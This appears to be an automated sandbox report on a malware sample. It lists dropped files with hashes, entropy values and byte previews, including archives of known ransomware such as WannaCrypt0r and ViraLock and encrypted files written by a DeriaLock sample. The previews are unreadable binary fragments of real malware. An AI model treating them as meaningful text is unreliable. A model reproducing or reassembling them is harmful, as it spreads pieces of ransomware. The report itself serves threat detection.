                                                                                                        Preview:PK..........yE4C.......p......Endermanch@PolyRansom.exeX.......%Q.......C.....]V.\.....#.X...z..K.'.uK..7..Gd%._u.G5..0..).Nz.h.....%._..TE....)..H....X.b.(.%]]D..."..0.|5..).G.-h'q.:...}b.1...:.^..d.d.t...9...iY+.....f...!.fn.sk..UG(......b..Rn_`....l....7W!...P.n{.....F...`C.'.....N...i.a..kD*V.XH......2....#...t.p.=..v.ykKDF..>..d.....4=.<.1..k.a...W..V:....m.1..g...U....l.s......../...3a.*.....TRG..N... ..Bm3.!.k.m.!..RIrjR;.^.n.....#.sW..lP4..!F...MR1..W.....u...@ ....#..[J{..U.....a6.fL.......HU...v-..<.HU ...jy.;..=........<._3..GP .%..(....K...s..%.....s.. .....Vb.N,.<.... v.(WM...j6.5.N..m....XzTm...$......[W..%!WY_......QAp..Y...#.3G.....b5...>......&.2.....&.QS.w.D.`...PF[.!.. ...h....-...`..?N........z...%.|..nD,VdW*d7....XC.(l.....+..0Z`................Ug..(..4.4...s.Zh.m._I!.f.6.|...-..aB..~iid"o. ...c..N.)..y....x..H....#|5.N...N..r..h..-c...>&v..d~e..9.A..(...2.6.?...;....D....-..w..~V..........U......$..[.(o*..........T.
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v5.1 to extract, compression method=AES Encrypted
                                                                                                        Category:dropped
                                                                                                        Size (bytes):135339
                                                                                                        Entropy (8bit):7.998464822213335
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:3072:EVGcVUZ2RO+vvmYYN4ul1c0wTLcc0JuEzXiXoNn59cz+P+gJmq:EFVOYM4IwUc0JpzXYorWyL
                                                                                                        MD5:6A47990541C573D44444F9AD5AA61774
                                                                                                        SHA1:F230FFF199A57A07A972E2EE7169BC074D9E0CD5
                                                                                                        SHA-256:B161C762C5894D820CC10D9027F2404A6FEC3BC9F8FD84D23FF1DAEF98493115
                                                                                                        SHA-512:FE8A4FD268106817EFC0222C94CB26AD4AE0A39F99AACAA86880B8A2CAA83767FFE8A3DD5B0CDCC38B61F1B4D0196064856BD0191B9C2D7A8D8297C864A7716D
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..3...c..7yE................Endermanch@ViraLock.exe......AE....d...EJK.k....+.$?.X;....g.........>.jO..y.p:.d....~.......Y.y.....Q.....iy...\...}.....V.sL..@t...<....au.l=i.q..w..*..`..h.a.........3\.0.ox.i...C..f.=.E.....>..A....2.X.#.qml>...5.YLj]!Id.#...A .1n{8.D?.P5..<.G[.R...P.j..m<$...O.\v...%...R..s.M......:.;......*....!:.:-.5.p.....d%..C....^n.....,.l.qWN..T...rW.~zlz...<H....?.....m.so.e..*.k........?..bI....c.R...j...3...g.D.O.&B.".?)Z..=.y...J.^s.Z.....f.n...J..d7..&]...&..N.}e1......2w.w.:..C9W..B.T_..%.4....y.qa...Q'ry.f...;KY;e..VN...PE|..d....T....d..{........(..r..b1.R....J^...E.H|.B.q(..`.3.....Ge.........D...........R...>....?.#..B..s...Z=..y.E.Ux.m."p.i...p....Y...2..C..3].q.7...i7.C.Y.Eo...z..]... ......)H.;..D......+6.Q.d.o.d.=..e.O..[+...,..siV.1f.........[.....XTh....(.......fmf...m.......T..?....r...O..'#u.=.....Z....|d^..<....n.!.=dwos.|....e......ul.0.z....Bp..7|(~.Q...Z.>.._.V..W....t....2%.....7..+.....B....
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3477754
                                                                                                        Entropy (8bit):7.999945362964861
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:0x8KJHkctwJdVlgBq+q1vqtWdhQIajy4AsOLgVv+L3QXz+B7m1qyapDgJmeiTLW:0x8KJX+dVHvtzaj3xWgw79icXW
                                                                                                        MD5:E58FDD8B0CE47BCB8FFD89F4499D186D
                                                                                                        SHA1:B7E2334AC6E1AD75E3744661BB590A2D1DA98B03
                                                                                                        SHA-256:283F40E9D550833BEC101A24FD6FD6FBD9937ED32A51392E818FFFF662A1D30A
                                                                                                        SHA-512:95B6567B373EFA6AEC6A9BFD7AF70DED86F8C72D3E8BA75F756024817815B830F54D18143B0BE6DE335DD0CA0AFE722F88A4684663BE5A84946BD30343D43A8C
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK...........J.."@>.5...5.....Endermanch@WannaCrypt0r.exeo..h.....7...8..].}..!..'...4...dl..W......n.g.1x.;..:..$W...)@..]t ...s.I..J...B.:.|.fcJ...HtS..}.X..Pe..0.....f5U.../..^@x.O...i.....c....:no..."m.O.$........<..H..f$...0..G..V.D..y..Wn....2.F......O-..j..&...'V. ...6..p......S.....b<1d.H.W._.d'..4v<M{...0|...CS.Tf...L....+.@kI.PV...ZM.tp..L.....I......!..!.@n..gcSDm,.......{M..-.a._..6`~..:<...DT...f..d.(..."..xOsr.1W..3.*.........lJ...!...=....N..8...zU..J{.n......(:.-V.(.&.n..M.#dkT.....T..O.>.3j.0...U...:). ..`.."1...yQZ..tt....B.....)3e}6.2.b.....q..D...g...?..!...1...6.....U...k..M.J......R..zf..c...&.e2>........L........(P=.......Vp.T..2..&9.U..+..WPT.....u.......0...!DmA..&S....n..d..I.Jz#!..7....vn7.?...~.H...Wy. .7K....#$..q...E{.B.An..>...\..#3bq.H...>;j........].....3_zk..k.......a"S^B.f...D0....<J...4#..MZs......E..._>.L8Kr.0..z.....F...Z..~..!.U.g{X.....i&1....EV.P...C...F((.....)C...I.5oW.....2.c....&...>C0..
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1654828
                                                                                                        Entropy (8bit):7.999880621363435
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:49152:2OiR+zJsyziTwWQRtQWgpn8QbX1ncWFwUGVF6VpHk:2OVdzVW4tQWgp8QT1XFwUGKPk
                                                                                                        MD5:713F3673049A096EA23787A9BCB63329
                                                                                                        SHA1:B6DAD889F46DC19AE8A444B93B0A14248404C11D
                                                                                                        SHA-256:A62C54FEFDE2762426208C6E6C7F01EF2066FC837F94F5F36D11A36B3ECDDD5F
                                                                                                        SHA-512:810BDF865A25BDE85096E95C697BA7C1B79130B5E589C84AB93B21055B7341B5446D4E15905F7AA4CC242127D9ED1CF6F078B43FE452AD2E40695E5AB2BF8A18
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK..........HpF..`?...R&.#...Endermanch@WinlockerVB6Blacksod.exe....E9u.....!j%..R.l.M7.I......m...............x'...o..2...`.FU}.,..s.DI..|j,.zXxA...B..uG.y....v.d.jx....p.X..c.i.l/!..1..T.._.z0..o......#.A..dA".;'E...Q..F.J....5.X!.~l......<K&..1..oC.'..Y.\....gX..3...CJ.?./0..7[.|d..._...y..X#..a.;......-..2..|..G.%W...\m..Y.&w/....."\......@.R..m<tgZV*...y..9+ ....R.V....7.8t....7..........O PZcW.....e.....7..}.K...4.*.w.DK0...KbV.H..W<......g7.".js.H...f..\...2./KX..@.p........\.F"..S.r.-,.b._E.{...=...w..2;w.&.S..K.Fg[.d#v..R..<L.k.@..<2.t<.5}e...v...rP......6.?T....g..................#.........v......O.l;. ....=.{.m.......C..._..[$A1P.9....h.d.K.m._...:j.....:.kJ..."wz........6.+..yi......e....,5..%....J..k..I...;...s.?..\H..7=.$..VbU.#^........VIS>..Kw=W.YO..;.k.[$3..lM...G4U.9..)=....-.....'.Y......R....=.b.R..j.....?..y.,.......<GT"..Y.Z.....b...s.f.*...I.....[.D..J=...l.p.s3]g,....vD..8.]...QW..^..X.y9..:...I..........xA.oj.....
                                                                                                        Process:C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                        Category:dropped
                                                                                                        Size (bytes):77102
                                                                                                        Entropy (8bit):7.997393453617121
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:0Nm7bj9DAfxcbnnOOPjaW7S3ayJpOGtz57MC4Wlzy1vG1NyY/:qAbj9EerOOPjV23ayeGpM+18c
                                                                                                        MD5:213743564D240175E53F5C1FEB800820
                                                                                                        SHA1:5A64C9771D2E0A8FAF569F1D0FB1A43D289E157C
                                                                                                        SHA-256:65F5D46ED07C5B5D44F1B96088226E1473F4A6341F7510495FE108FEF2A74575
                                                                                                        SHA-512:8E6B1822B93DF21DD87BF850CF97E1906A4416A20FC91039DD41FD96D97E3E61CEFCD98EEEF325ADBD722D375C257A68F13C4FBCC511057922A37C688CB39D75
                                                                                                        Malicious:true
                                                                                                        Reputation:unknown
                                                                                                        Preview:PK........;.=>.#.}.,...P......Endermanch@Xyeta.exe.V.t*J...:K.J.....(.T.........zv.....+jQ..s.l..'OZ..5.a.c}..>..+.M.\....C,c...E.L6@ml.D./.&W..f^...`........T.%.u....X......%..F..i...'.F.....R-.8.9f:......d...Gd.B../...&g.c.T..P#.].>w..&S\.i.b.....s..|.....P............[.}..y...h.5]v..a....I..H.?.......B.Z./<.%.S..v...q....#.g,{E.a..&k....]...[8..%.x U#..-.-&R..M._|e.+.1.L.+.%.U!..iK....y6.r%..NR9......F... ..J~..n.]....'.J$+._l'.F..........L....-b.....'...8......0.Q...._...i..=%...M..?.)`t...2..Te....7\'. ..m....~}....d...:%...7FV&..Y..=.xG...*.)9q,....}..u.H.@]7f..T[.....{.....$E.f..x.s.N'(XI..j.X.b\..J..,..I.<.>....!.nW...4..7R{ ..?......PG6.yh....f`..".J B.l...'6.&q_..Fhr@.:..kkbiF...2/q..^.@.DH...s.^..7@...&.....\3.;:.%' .?.......D....C?....A....X.p..i.7.YY:L.JE.{..CYfp...n..<.wXa%}..........X.#I....:.eu.....:......FMUk.l.O'...'....].*^.95..i.F..sB..A.ZG.]/...+.....3.r6.8*l.....G8A4}.C..1.~....`....|..~....nL>(@..p..~..z.....}Fck..W.....J
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.828401008033129
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:lAIfEQCzkpWb9tejPVl4YNxVSawWgmeAnp6dWHji84bIjS5Ptz+kfzI:aPBsWbnOVpAa2tdwiJsj4lzdk
                                                                                                        MD5:0665EFEFD41A17F3BC38DF22AD81E20E
                                                                                                        SHA1:6D7CED3F531F97C1E8308281CC93E4D9971B6D79
                                                                                                        SHA-256:D7AEC061898C811759C76CE281DBBDC9FD4836F65DDEA2AFA5D393D83DCB918A
                                                                                                        SHA-512:83FAC91C4D93393970FBF8185696D74460E8F13E2A41B0136BD49AF1DD8ED386D313686B2191B8E0B7571A650A20C2C0BB2FB85C7C9273DEF4ACDE7CAA417D3C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..WXa........^.j.0.+...4..k...8;.l...\.^DX....!X./.U.O...}.....L.yM....Q.,.Z..&N..6.Q1.28.n..n.IMN....V.N4./:.y..:..j`"/..N.......H.b.0@y8=...B(..v.%...c..1..3\.i......%L....lkc...%.o.&.*A.H.y..Wtl......4...t......a ..]../z.... .:h.V.S..[..Z#l...z.\.E.v....M.m.".Bx.6.0#........{..~.!].R.....b.......?Wz.r#.5Ps.D.K\.d....t..V.M...a.4...~8M....y.xS|.j..i..O..j.....#.IrC.(.\.G.iO.Q.....(..q.4 o.O.z.q.>.VG...vom.T.@...=._...}.CM.^....s9....|..u,=wG.^.....G...<...6.T.tfl...Y.M....T...!.....pH...7...W".*..E......(c..E}..74-."~"M.*9..jgk[^.....2..~a<.h.2j....:8..SL...L.u.t.5..e...P....Q...-...s.{z.|?.N...IU..XW.(....N.... p..X}.4.M..9..F...h..B...$x..R.,.'.m.+EC.....T.C8.K....CT.W.4.8h.)6...:.y*aH......Q.......]q..]....x..L#_....i.d..uWAU.F.....e.KjSP?.....{1!.kB..(z6.B..dP..vR3&..X..Y..{.-(....q4.2.9F.T.ph.sZm!......j......p<M5.Qo1._k.ABD...W...Qh}(H.N..7!.`..x.l....^.{..:.r ......ip=FA..*?a.......D./..F5m%~..k+5...+..p..c..(..`...K.7._z...._1..}..U
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1040
                                                                                                        Entropy (8bit):7.782223501366278
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:vGRjPd516trSBUpCao3iusKACtnRVKVCcYHBrvIxLjz3TG:+Rjl5QtrrpCHPB7xRWfYhTAXe
                                                                                                        MD5:E714E847C55CEA0C30B477F790941498
                                                                                                        SHA1:4334092E5E41AD9A534363E3D5CBE1A270BFE125
                                                                                                        SHA-256:FF267CF8C484739357515BED32C423D585B8153DE5113821217C25949C726B5C
                                                                                                        SHA-512:E33B03010CF98B151E2B4891088A777AA188B5A8CCCA791E8DD9CC7E356F9B0441D75AC471D0368E1203C9F0B5F21CAB06A313B795BEE4A8733E48336192DD21
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:=.<..P...Ba*#.tG....q*.....j...1..m.:M....^9.|,8.Dw..b......p....}....g..w..)..8.X.......X.D.).."\..[b...t.-..o.'...+./...n.Z.o[...9j.j......G....`.y.$$..V_K..:!........-...\..........f....$.dF.j~Y@.'...P.T....K.yLf...`./.'.n.P..=......./.o\a..;...q........;.".&...u.&.*..>..M.....&?.^8...3sJ..Y..ob..o....s6.'(.`.YWB.}<u.Z..aSl.>.X.D.+/K...H./+n.QN....}.~...X..e....,....@!K..p..A5.Sy...b.CG.^.+.....n...3{a.$ga..._...E.eq...Sf.?^p..~....3.US~.....1.{..:...y}..v>..i...C.x.:.3.pH%..6..`,.:..j.....K[.u...I....^.........k..S......#..`.#...DU.{W.>.o.h.....ru....Z.......G...^.....;y...v.kY.3.......~.....P$...nb......1TRn.....~....w...uU.4...0q.'$..Q...{Wi....n.6..-.&..1...............&.....$.k.D.W./.W..V.5E.~..#.....>e.e7.<.../.P..`...3.YX.-....S?H!b........Q@.>N..-.Y....4c......7..T%|h.#..j.......I.D..Ae....!N..m]^.... .M..e*..9X.)Q.......L.Y.......4.E*..s..K..'p5..M.D...,.S9.9W.l....H.6.%D...9.A.>Z..G..*..dz..<.E....<...d.p>.O..q......#.Id;.7R8.@.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.8091129163600925
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:J1tbb/x2oLnqHUXNh7Jjb26jx38FpAsxtC0XRe+5PpdLpHs:JfnmEf26Sp/wsR/d1M
                                                                                                        MD5:E2478862289BC4D15914906CF066D28F
                                                                                                        SHA1:E669417D1394F1175922435A1E32AE783733AF28
                                                                                                        SHA-256:66C6BF2CA9FEF18C4D2478568A972B6C9B20583D82DF6A1140A1090344F770A3
                                                                                                        SHA-512:A36CBFED7A0ECFA5A161CEC36744834EE132C8D1E6ADB461B3A471702884E69A3BD5B6D1627D632478663C7273BBE3A2B3256CAEB0150AEC12FEA166F1558EA5
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:............Z..y}._\.tbJl....|.W.c.._a.....O...Q6 ....,..\ ..NY.sG...T,7.L..^U...|.........~"h+<q..P.Di....#.4..5Ax....D3.C.+EW....*.c..f..i]I.HY..T...[L.....XH..e.?....M..Gt.].il.C..VX.D.......8.%....V.w..a...z5.U....=....CUN.P.C.L.g.....X....G@.. .A7ef.....G...\....E....^.a.@...'..........[.%."N....l...w....y.....K:.X......g..$1.j..8D.gHw*o)..:..E........z..E~.z..d........?n.v.J..>qd...q..O..v.uwvK..`s"..{|?...lg}..Z.."...d.....Si.X>......TA(.3.9..B4.g...Y&z...~.P9..s`...s#..#D~8......QpV......z.{,L..FmG<....-W..."!.....a<SM.qA`.V.7.. .P.@..{..@..wi.R.........9..J.&..h%> ......)..Gv/.....C...e..~sQ.Ky;8/].#.K.?"...{.....Ve...`."E......8..s.A..WI%....h4.n..+.q......-.%U.d..mmv.H....._cq.e..]B..D..fP.j=..Mi...Ja._i..*O... ..}..Bf.7:C.w.f.8.J....N.d.V...c.K>m... .K.v.j!8.L.....~..U.Tr.%.W...q.n...q..:..,..-.a+X<G..p'p.v....B^.........`S._u..m...q.R.T..^.V.&..+Kg}..+8.LT.......me..O.<.8.<.r..R.K.R..T^e..g.J.y....X.CNv.hR...v.>.r.q..&~G2...8
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.797049092452068
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:1UK4eCYOBISAWSLRwSE+ZitQdd/tEK1HTuCeTedxk3Kv7V3AVPqq/JlMt:1vDCYVG+ZitQ9lHIedGKp3AYclMt
                                                                                                        MD5:D9F9B76CCB11CF787B37ECA4BC10E57A
                                                                                                        SHA1:FD91013D54503A32C57C7CF74DB1F1F08B45A855
                                                                                                        SHA-256:8CDE7BBF22DD807995EB28BEA5F35AD985890BBD037459891D5EDF7DD2BD63CA
                                                                                                        SHA-512:CFFF809ABA592B6C01238E748CA44317C0699281B54A58AB032FFCFFD1AB506247E01A2BE89F33C790CD7A8C2F7432063C1709FDF3960CF0E01D45E218420D88
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:..Xv.l.X....?..B.>....~.....h....n..=Q.'.....>.D....-...t.hGy..a.`.<.*&....1e..7M./py.UBr...7.P..V..P..#v....h....3..;.....X.,..x+.x.n..>...K.A...-T.r.....A^?E...% 0...A...vQbm..K...P.x.lU......W.D=...I....Gx.-...l.x}.....,,....:..mZ.....7X...fA".e..../v{..o.Q.......4..& b....Z.g.!|....*...*....9fa...4..$..5.;1L...v..!.1dQ..c..D....m.0]Eb..E;........z.E.I.e@1.d.....R.}3.....6..n.....hb..G..w5...b.).....e...N`........t.N.M....G.=.w...|.%...3 ...f...6.D+.|5.......8....i....3;...%W]]&...%6C.miQ?.E.c..>.e.4.cH...,..a.^..&^.1.......q..........4.)T.xw..PU...........)....4..Kx.NN..VY....D........X.....?.B.i....-r;.L[^-.\;.W.j.G.......6...L:.X.n.L......X..u.w.....&.jS.cnf...3n..:.]L..Qi$g..0g...._t..0...z...nv*....q.....>...)~.}...f...J...E4..{Lvl.....?.F...c.`m.o|t..H..[...w.....y/..}..~V.~..&.f.x......H.F.Xk...I.^-e...!.-.].,......f.}u...j...P....C..0..g.M..mG..Q-...w.^..=...7~C....i..E;.4sh......OG.6.5.D....hk...~........vY.G7$.u.....}.b.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.820045811927978
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:4wHM+BlVEaOuEL5A9c3SSdoTkLIlDpHNdYhSkZGnD4UQPuRZsrbIE:4wfBlKa1EG9HTCKTYhSkYDZMuRZsN
                                                                                                        MD5:851B2A7216F0E064F227D734D8D3AD21
                                                                                                        SHA1:58D20EF3F762FEDF991787095E971232089C507F
                                                                                                        SHA-256:2E3857E4FE56D7EE1FA794606B09753324B3CFE78AB72D9C0344CDD1DAFC9121
                                                                                                        SHA-512:4762239626DBFB9F9D0F3CE09432E598996115AAFA58DD9751BE1B613C8CB3CA17EF0CC8D1C3F21EA285AB482D5C525E3DAB190CBB74F0114E995C2D3A71A5CE
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:b..>q.{\>.d...x...3.. .LV......,vS.D'.94.CeZy..L..'[y.........P...u...IF.&.((.7..........;.F15r.f.E7%u...,AX,v.~..I...J.&...[m..HY.n...^.z.r..:@.R.")...@.6q5.7..]P...X.d.sK9.".1).......zK.e...q.h_..].Z..?......'..b......O.a.f.;B...a.C8i.gpZ...R.......].rH.30.....v.}U.......s...{5.#5...E.&..,....J.3.B.>.X...Hjk.8....$.........3...D xy..O.g-...~\R.vRQ...?.w4`U._.z.#.1s%..a...e....}w..., .5.....=^.].`i..i.....r...BR.?I...4...16..N...4...~.q....[...sW.......H,G...7.U...?X........,.k..v...<....[4!.y.C'.Q.t0qA:...9.yiB........}......*.QR."..-z.Xk....`.....%`>3d.L.'o|..E.Bf}..._.J........R....t.....3^.."$y.....6.F}.U_.K..@...+?Z`U..gjo..v...+..au.by.2(3....A..y....M..A*p.....U......\k......|E.70[!.Ww....[;.....CJ(..S.Ws....5..%9..^.+..P..'.V...;..K.....a.5q..C.:..=......R...ab+!..v....e7...+.j..$[Lg3.q...0cm!..Ae....y<.<.../..f.O..n...-w.?...V...V....*k...6~.M|...K1bzF..}.....b_...h..D\(.4....X..:.../...].L.%ey..+g...$...^.6..h...(g
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.837440617768385
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:gVGVuiQw+Ow+h1pDXa0rcU43j/ojX2vlslQ0fe:gYlAOh1pLaEcUijf6QX
                                                                                                        MD5:BD59E7AFCA1598637312D67FB154177F
                                                                                                        SHA1:032833C30759C95A79A9A26A9852744F20B96F35
                                                                                                        SHA-256:F29D4367B54EE563886F9080D1DD77FE5ED485501BC3A45099F83FD6EC70179E
                                                                                                        SHA-512:2CD0C20EB1F2D7F7CC6D91CF80B5633F650C5CD4F5EA49ED576DD052B12C5BAFF08DB2A77F216F530BE794F6CE47B79848A64A599F8388092D9C73547E50037C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:.......T...@....su..TW..H&..Y.@\.m.#g..,s.1..4....}o...?..."....6.2....W.x...0...}(.....j...%.I...0vi.2.U.G.ekZ.2v\.N.i.r. ZUo..+m.........!...;z...h.L.:.<.. bu.V.e...;..>.CSH'..]+e..|...NO.......z(|F:5k....c.K......F4a....U.$,77:.N.........-.m..$0..cu?.}C..... kVW..............C..t{q.-q9.^.=.IuZ...xm.-(......YW..^]k;..K.S.F.....&[{....>.]dd..e..2.)5`.D.D/...J>.p....k,......K.);...(.i:...a.y.-5.r...j..#....-..F.V.....p\b...i:.>..1"..Ocy..1>p...j...r....T.H..$.>-.A.4ch.x.q....Af(..S|/....j....7.z.Wr.:W.P.^{;\x}..e....Rb.....7..P..8.(.T....$...vcS.....,..#.....X...Wn..e.e.....0.......]Iq.:0.=.,..Ko.oL.'S.....?3.. .Ig:......r=...G@.8l.Z..Y...<.[......0.U.....U.n..=..c.qaHs..}"........*..._B.Hg=.........@qY...../....z...>.u....Y.}<.4'J~~.....F^."r]..U.~... `.l...w.3...%-..$g.....ee/kT..4h7.].M..2......."..s.H.g........SS..D..*I..!n{\..R..M.k.&@.....}hH.B......*c.ILitO.."1....y..NR{........6ENaZ@.... .C0s"..n...u..O...G....>/B...c.DUzJXr~...jN..<....
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.829001492619903
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:xk6kjwVFgT5C9dokCKD4/urqFNI/1YcSs2uCZ5:xVkpIjSmwNnG2uCZ5
                                                                                                        MD5:0381999BE1FF8125CA321FB598E571E5
                                                                                                        SHA1:02235B23902AB76D5372BADFA0E774A9778BCA9D
                                                                                                        SHA-256:DFD62B731A148C77EA6AC44534056C2A4E5625422B02CAE8F02800A5B3DAB5E1
                                                                                                        SHA-512:95F48CDA03AF84B25DC39A2B462CCEABDBB6F84C15CE443F25116F75BCD8F295F6B525C6489C5993FD4D45E79975F3678897E6CA1AF518A7E825C5DD9EA0647C
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:...W...(e....a..... .._...@iZ.x0.....2{...j..u....p.< fw..s.r.....n|h....y.xL\'.~..P.g..}>..]...[..<Z^.d. .h.-.H....K..9.*.aZ.v..3..^12."Z.n...Q...|.6j5N;..:.H..1....B...5.Dz..j..Y}'........F..62...KE....*2`KQA3.....L}...H3..X1.m....s.%..B...Xw..#.q.f....<...-.....z...."W.l0n7....1..i.L..4-Z.2.P.....k,+=.z........&w_.mt....>.#.8v.qp:.~>M.Enp..E.._gH..._..J....o.2.T.$..c...K.....u,/.y.T...F3..A.. .&.s.,.r8'.x|.g.W..&!.X...^M.PSHk.^..8E9d..W@@$..8.......j...+.C.....Q^!....T._..I.S.*.... K..vfG..*?..B..<..A[..../."OrPq(..0....o....,p....Ec..>A.^....`.@.Q+..\.O0....#.wD..q.x/..m?.....P..I.t.....@..__.w9.z.Rx.hQ.j.."<].'Q_.UrV.~0q.@.).n8.V...m.c......;.]6....G.1...U.. 9.>....~...U".HTi)F6I..6k...a.K<....X..X.Z/.;.?.zN.=....Z........Q(R.c'..3a......8|..vF.'A.1O9...)L2X...R...$..>..5=^....&..........~o..q....;....eF.f.`.;.TJI........n..].C.k'..FA-..D.O.\rt.I/.3.....-y.V:....ZI2...D..u...e..o."^...Ex.Z.`C..a..L.6.'7'...|3.S.n..D...;C(.Ms..Q.
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.838773642918542
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q+/WXFzx33zxwEyPW/QXXThQLyP+4GMHLvPbgOta5lZRfdWKxyQHLlAh:q+uX/Hz+doGKyP+4GaLvPbDta5lZRfdI
                                                                                                        MD5:615E7D92516C0AF85EF608EBA6C6881A
                                                                                                        SHA1:4ED2658550AF8832A89BE1721180B0BFE1697385
                                                                                                        SHA-256:6694010420F05CDD51B525A8E9BB83300CFF08E041989D038A383C2959820EFA
                                                                                                        SHA-512:319EA6EA6FA9D521D6ACFA0911EA976F3396913676084A0FE42824BA54E93CB3ACC11CA855F0AF354944D23A6365C7850A7DCF8B0B2DF6145E801CC6F5E0A76B
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
                                                                                                        Preview:,...)..EIVn ....7.....@......tFO.75...r.NE.......Hu.......S..D....y.....:W.[.;.......R..N.....B.|...Jb....|BQA.v6.w..y*...i.Q.dXo..~R..(..R.'...G..]5.:8....a...k..f..C.9H)..O....l.|..y..xf:.6.L.=..Rd!o..x...MC..\.q.+a ...q..N..t..!...@.F.~...Q.n......np.U.p."t.E.j.Q..5g7Qb]l...z.(.....w......$.E.Jb....{....4.....F.P..i.2......,...<"...N.z..u..<..x..".....G.[O.0..d..u|O1.V.`.^....22.*.!y.6...7:.Aw..._y>..0..Y.a.......{73........Z.7E...i...&....^.T..*..(.0J...D.3b.....X....w(....(A..(..C*s...PA.$%dkM.....^.....%.:..;-1.?.&~.!....o...a.q.p)t...Q2K..=.3....N...N..?..J.'O.zd><E...D...[.P...U.y~O.|%.....A71,....^.b.K.3L2.Qi..V"l.......G...N}ca.D"=.i..e8..,..^....0zw...%...CFi...l>a*...v.:).....vUI{D.W.q?Mvi<.~w..}......3.n.>....T..p..e.}]t.6.l.B...3.._M..8.{(.Gw.m.$.1FH+....:hl..7...3j.4..v...u,v.n1..Z.7..3.[....^./......W.a\U]......5._.{..x...;...+....}Q..d.Z.\.>...../!F...?.......]...Qj.'}g.rJ.>.X...|..u..v....p0...Z.k....gb...}.......U..Y..
                                                                                                        Process:C:\Users\user\AppData\Local\Temp\znyh4aj1.jid\Endermanch@DeriaLock.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1088
                                                                                                        Entropy (8bit):7.8210721146019635
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:shALED1nx3en8O8lDPQYMC85Ah17++tAExHRhfL/4SoUGtO:YD1nx3lhcYMZ63IEXhT/4tttO
                                                                                                        MD5:C257D842BC13D3C1BBAB1387FEEB1137
                                                                                                        SHA1:F998187EFD9290780C4486ADF33F2BF7D506677C
                                                                                                        SHA-256:60C7FCCE2950AC04B0902F2AA67E4914065FF5892375B12D78689C6219A67B33
                                                                                                        SHA-512:AF36ADE1AD3A45170CCA04EEA66EF0E4BBEC00A8C7E59C4185ACB8FC4487BBBD74A2527A96EB1B45B1170508363797275FEFCB59647519606460DC88698E3F80
                                                                                                        Malicious:false
                                                                                                        Reputation:unknown
